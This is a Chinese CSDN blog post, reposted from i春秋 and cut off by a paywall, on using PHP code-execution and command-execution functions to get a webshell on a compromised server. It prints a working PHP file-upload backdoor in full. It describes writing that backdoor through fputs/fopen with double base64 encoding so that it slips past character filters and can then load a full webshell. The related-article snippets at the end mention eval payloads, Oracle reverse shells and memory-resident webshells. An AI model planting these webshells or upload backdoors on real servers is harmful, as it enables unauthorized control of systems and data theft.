菜刀(代码执行)函数和命令执行函数详解及Getshell方法

最新推荐文章于 2024-02-16 16:33:43 发布
最新推荐文章于 2024-02-16 16:33:43 发布
阅读量1.7k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoi123/article/details/80652673
版权
本文详细介绍了PHP中的代码执行函数(如eval、assert)和命令执行函数(如system、exec)如何被用于获取服务器shell,以及在不同情况下如何利用它们上传大马。通过示例代码展示了如何利用这些函数进行代码注入,并提到了在命令行中使用`echo`命令写入文件的方法。此外,文章还提醒注意特殊字符在CMD命令行中的转义问题。
摘要由CSDN通过智能技术生成

i春秋作家:大家奥斯的哦

原文来自:https://bbs.ichunqiu.com/thread-41471-1-1.html

代码执行函数 VS 命令执行函数

     一直想整理这两块的内容,但是一直没时间弄,直到前两天碰上一个写入了菜刀马但是死活连不上菜刀的站,顿时不知道怎么继续了,所以就趁这个机会整理了一下代码执行函数怎么getshell和命令执行函数怎么getshell的思路,各位大牛有什么想法可以一起交流一下。那么我们开始正题。

     菜刀马的原理其实是调用了代码执行函数。而菜刀之所以能够执行系统命令和上传文件,也是调用了命令执行函数。命令马的原理是调用了命令执行函数。

     这两种都能够getshell(以上传大马为准)因为有一些服务器做了限制,比如菜刀连不上,或者禁用了某些函数,或者利用SQL注入写文件和XML之类的漏洞,所以有时候在有了菜刀马和命令马之后要上传大马还是有一些波折的,当然能够直接上传或写入大马的除外。

一、首先是菜刀马:
     菜刀马的原理是调用了PHP的代码执行函数,比如以下1和2两个常见的一句话菜刀马,就是调用了eval函数、assert函数。

1、eval()函数image.png

image.png

那么当我们上传了eval函数的菜刀马之后,在连接不上菜刀的情况下怎么上传大马呢?继续往下看

这里我是先写一个上传马,再用上传马去上传大马,有点多次一举,但是考虑到大马代码量太多,还是建议先写个上传马,以下代码只有1kb。


<?php

@$temp = $_FILES['upload_file']['tmp_name'];

@$file = basename($_FILES['upload_file']['name']);

if (empty ($file)){

echo “<form action = ” method = ‘POST’ ENCTYPE=’multipart/form-data’>\n”;echo “Local file: <input type = ‘file’ name = ‘upload_file’>\n”;echo “<input type = ‘submit’ value = ‘Upload’>\n”;echo “</form>\n<pre>\n\n</pre>”;}else {if(move_uploaded_file($temp,$file)){echo “File uploaded successfully.<p>\n”;}else {echo “Unable to upload ” . $file . “.<p>\n”;}}?>

原理是利用文件操作函数如下:

fputs(fopen(shell.php,w),xxxx);

写入xxxx到脚本执行文件当前目录下的shell.php文件。
由于是利用post传参,不能出现【<】【>】【+】【=】【/】等符号,所以这里我们需要把代码编码一下,将上面的上传代码进行两次base64编码(为了去除=号)。

☆☆☆</

最低0.47元/天 解锁文章
张悠悠66
关注
命令执行代码执行
weixin_45253622的博客
03-26 6098
命令执行 简介 命令执行通常因为指web应用在服务器上拼接系统命令而造成的漏洞。 命令执行直接调用操作系统命令。在操作系统中,“&、|、I"都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。 场景 该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslo
php常见代码执行函数和常见系统命令执行函数
最新发布
weixin_67840381的博客
08-03 267
a($b)动态函数。可成功写入一句话木马。实验靶场以及页面源码。
命令执行函数
beauty9235的专栏
04-08 874
StreamGobbler.javaimport org.apache.commons.logging.Log;import org.apache.commons.logging.LogFactory;import java.io.*;/** * Created by IntelliJ IDEA. * User: Administrator *
命令执行讲解和函数
Ryongao
02-16 2063
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
命令执行漏洞详解及DVWA靶场练习
c_programj的博客
06-25 3273
命令执行漏洞1.产生原因2.漏洞危害3.远程命令执行4.系统命令执行命令执行常用特殊字符5.常见 命令常见系统命令与功能windowslinux6.防范措施7.dvwa靶场练习windows【Low】【Medium】【High】【Impossible】linux【low】【Medium】【High】 1.产生原因 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令执行。攻击者可以任意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。 RCE:远程命令代码执行。 2.漏洞危害 ①继承web
CTFSHOW(命令执行)【学习记录】
ximo的博客
01-27 2772
学习记录web29web30web31 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 对 flag 进行了过滤: 姿势学习: c=system('cat f*'); #正则表达式 c=
利用oracle反弹SHELL 获取windows服务器权限
weixin_38023368的博客
08-08 2893
运气不错,找了一个Oracle注入的网站 网站是我自己找的。。。 监听的服务器是我自己的。。。 仅供参考 原理我还是要继续说一下的: 利用oracle  GET_DOMAIN_INDEX_TABLES函数注入漏洞  反弹SHELL 利用exec创建java包创建账号 lcx进行端口转发连接,下面详解介绍每一步 反弹SHELL GET_DOM
DVWA大通关详解(持续更新)
世间繁华梦一出
11-25 4073
** LOW ** BRUTE Force(爆库) <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FRO
PHP常见的命令执行函数代码执行函数
dys的博客
06-23 6095
命令执行代码执行
php如何用菜刀连接getshell,菜刀(代码执行)函数命令执行函数详解及Getshell方法...
weixin_29730445的博客
03-16 918
@$temp = $_FILES['upload_file']['tmp_name'];@$file = basename($_FILES['upload_file']['name']);if (empty ($file)){echo "\n";echo "Local file: \n";echo "\n";echo "\n\n\n";}else {if(move_uploaded_file($t...
php如何用菜刀连接getshell,phpmyadmin之getshell总结
weixin_34802266的博客
03-16 492
title: phpmyadmin中getshell的几种姿势1,利用全局变量general_log去getshellshow variables like ‘%general%’;然后将general_log打开,执行命令set global general_log=on;因为phpstudy默认的根目录是/phpstudy/www/,所以接下来只需要修改日志文件的位置到网站的根目录下。set ...
菜刀php教程,中国菜刀(chopper)功能介绍及使用教程
weixin_34774527的博客
03-09 5742
中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的:89/mingfang...
文件包含及代码执行命令执行
j1044957016的博客
06-01 2574
文件包含,代码执行命令执行常见的函数,以及如何绕过过滤
从实战理解代码执行漏洞函数(php)
weixin_51692662的博客
08-18 805
php,RCE,漏洞,远程代码,安全,代码执行
利用 Fastjson 注入 Spring 内存马,太秀了~
Java技术栈,分享最主流的Java技术
11-18 860
本文仅供参考学习使用。 1 基础 实际上java内存马的注入已经有很多方式了,我在学习中动手研究并写了一下针对spring mvc应用的内存马。 一般来说实现无文件落地的java内存马注入,通常是利用反序列化漏洞,所以动手写了一个spring mvc的后端,并直接给了一个fastjson反序列化的页面,在假定的攻击中,通过jndi的利用方式让web端加载恶意类,注入controller。 一切工作都是站在巨人的肩膀上,参考文章均在最后列出。 1.1 fastjson反序列化和JNDI 关于fastjson漏
小程序云函数实现个人公积金查询
"这篇文档介绍了一个使用小程序云函数来查询个人公积金余额的示例代码。" 在当前的数字化时代,微信小程序已经成为了人们日常生活中的常用工具,尤其在提供各种便捷服务方面,如查询个人信息、支付等。其中,云函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值